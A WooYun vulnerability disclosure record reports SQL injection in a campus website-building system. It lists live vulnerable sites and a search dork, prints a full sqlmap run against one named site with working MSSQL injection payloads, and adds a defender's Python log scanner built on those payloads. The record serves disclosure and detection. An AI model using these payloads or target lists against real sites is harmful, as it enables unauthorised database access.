
Vulnerability summary

Defect ID: wooyun-2015-0102740

Title: Multiple SQL injection vulnerabilities in the same file of a campus website-building system

Vendor: 南京苏亚星资讯科技开发有限公司

Author: #6c6c6c

Submitted: 2015-03-23 12:27

Fix deadline: 2015-06-25 13:52

Disclosed: 2015-06-25 13:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-23: Details sent to the vendor; awaiting the vendor's response
2015-03-27: Vendor confirmed; details visible to the vendor only
2015-03-30: Details opened to third-party security partners
2015-05-21: Details opened to core white hats and domain experts
2015-05-31: Details opened to ordinary white hats
2015-06-10: Details opened to intern white hats
2015-06-25: Details made public

Brief description:

sql

Detailed description:

The system is very widely deployed, for example:
http://www.dlwsxx.com/ws2004/model/login1.asp
http://www.fzjcxx.cn/ws2004/model/login1.asp
http://www.nxyancgjzx.com/ws2004/model/login1.asp
http://www.sgtjb.com/ws2004/model/login1.asp
http://www.sdwhys.com/ws2004/model/login1.asp
http://www.zjnksyzx.com:8801/ws2004/model/login1.asp
Search keyword: inurl:ws2004/Model/

http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0


[22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory
[22:27:16] [INFO] testing connection to the target URL
[22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:27:17] [INFO] target URL is stable
[22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] GET parameter 'KeyWord' is dynamic
[22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' might not be injectable
[22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord'
[22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] y
[22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:27:49] [INFO] testing 'MySQL inline queries'
[22:27:49] [INFO] testing 'PostgreSQL inline queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:27:49] [INFO] testing 'Oracle inline queries'
[22:27:49] [INFO] testing 'SQLite inline queries'
[22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable
[22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:28:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:28:52] [INFO] target URL appears to have 2 columns in query
[22:28:52] [WARNING] reflective value(s) found and filtering out
[22:28:52] [WARNING] output with limited number of rows detected. Switching to partial mode
[22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic
[22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFunctionMode' might not be injectable
[22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMode'
[22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:29:43] [INFO] testing 'MySQL inline queries'
[22:29:44] [INFO] testing 'PostgreSQL inline queries'
[22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:29:44] [INFO] testing 'Oracle inline queries'
[22:29:44] [INFO] testing 'SQLite inline queries'
[22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:29:49] [INFO] testing 'Oracle AND time-based blind'
[22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[22:29:55] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable
[22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateFields' might be injectable
[22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields'
[22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' injectable
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
[22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFields' is a false positive
GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic
[22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic
[22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType' might not be injectable
[22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType'
[22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:16] [INFO] testing 'MySQL inline queries'
[22:30:17] [INFO] testing 'PostgreSQL inline queries'
[22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:17] [INFO] testing 'Oracle inline queries'
[22:30:17] [INFO] testing 'SQLite inline queries'
[22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:22] [INFO] testing 'Oracle AND time-based blind'
[22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns'
[22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:30:29] [WARNING] GET parameter 'SearchType' is not injectable
sqlmap identified the following injection points with a total of 483 HTTP(s) requests:
---
Place: GET
Parameter: KeyWord
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&TemplateFields=1&SearchType=0
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99)+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)-- &TemplateFunctionMode=32&TemplateFields=1&SearchType=0
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&TemplateFields=1&SearchType=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KeyWord=1' AND 7937=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchType=0
Place: GET
Parameter: TemplateFields
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 6562*(SELECT 6562 FROM master..sysdatabases) END))&SearchType=0
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: KeyWord, type: Single quoted string (default)
[1] place: GET, parameter: TemplateFields, type: Unescaped numeric
[q] Quit
>
[22:30:32] [INFO] testing Microsoft SQL Server
[22:30:32] [INFO] confirming Microsoft SQL Server
[22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.fzjcxx.cn'
[*] shutting down at 22:30:32
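As an added defender-side example (not part of the original report or the vendor's code), the following Python scanner flags, in IIS W3C request logs for ws2004/Model/default.asp, the payload shapes that the sqlmap run above reported for the KeyWord and TemplateFields parameters. The log field order, the sample lines and the client address are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes taken from the sqlmap injection points listed in this report
# (classic ASP front end, Microsoft SQL Server 2000 back end).
SIGNATURES = {
    "stacked_waitfor":     re.compile(r";\s*WAITFOR\s+DELAY", re.I),
    "union_select":        re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "char_concat":         re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(", re.I),
    "heavy_query":         re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.I),
    "numeric_tautology":   re.compile(r"\b(\d+)=\1\b"),
    "case_subselect":      re.compile(r"SELECT\s*\(?\s*CASE\s+WHEN", re.I),
    "master_sysdatabases": re.compile(r"master\.\.sysdatabases", re.I),
}
MODEL_PATH = "/ws2004/model/default.asp"  # the vulnerable file named in the report

def parse_iis_line(line):
    """Parse a W3C line; constructed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 7:
        return None  # directive line or truncated record
    return {"ip": parts[2], "stem": parts[4].lower(), "query": "" if parts[5] == "-" else parts[5]}
def classify_query(raw_query):
    """Decode each name=value pair on its own (split on '&' only, so a stacked payload's ';' is not a separator) and return the signatures that fire, in dict order."""
    hits = []
    for piece in raw_query.split("&"):
        decoded = unquote_plus(piece)
        for name, rx in SIGNATURES.items():
            if name not in hits and rx.search(decoded):
                hits.append(name)
    return hits
def scan(lines, stem=MODEL_PATH):
    """Return (client ip, stem, hits) for each request to `stem` (None = any path) that matches."""
    findings = []
    for line in lines:
        entry = parse_iis_line(line)
        if entry is None or (stem and entry["stem"] != stem):
            continue
        if hits := classify_query(entry["query"]):
            findings.append((entry["ip"], entry["stem"], hits))
    return findings

# Constructed sample log: this report's payloads URL-encoded the way IIS records them; the client address is a documentation-range placeholder.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2015-03-22 22:27:16 203.0.113.5 GET /ws2004/Model/default.asp KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 200",
    "2015-03-22 22:28:50 203.0.113.5 GET /ws2004/Model/default.asp KeyWord=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 200",
    "2015-03-22 22:28:52 203.0.113.5 GET /ws2004/Model/default.asp KeyWord=1%27+UNION+ALL+SELECT+NULL%2CCHAR(113)%2BCHAR(121)%2BCHAR(113)--+&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 200",
    "2015-03-22 22:30:02 203.0.113.5 GET /ws2004/Model/default.asp KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT+(CASE+WHEN+(6562%3D6562)+THEN+1+ELSE+6562*(SELECT+6562+FROM+master..sysdatabases)+END))&SearchType=0 200",
]
```

Calling `scan(SAMPLE_LOG)` returns the three attack lines with their signature names; pass `stem=None` to scan every path rather than only the file named in the report.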

Proof of vulnerability:

Suggested fix:

Copyright notice: please credit the source when reposting: #6c6c6c@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-03-27 13:51

Vendor reply:

CNVD has confirmed the reported vulnerability; no direct handling channel with the software vendor has been established yet, pending claim.

Latest status:

None yet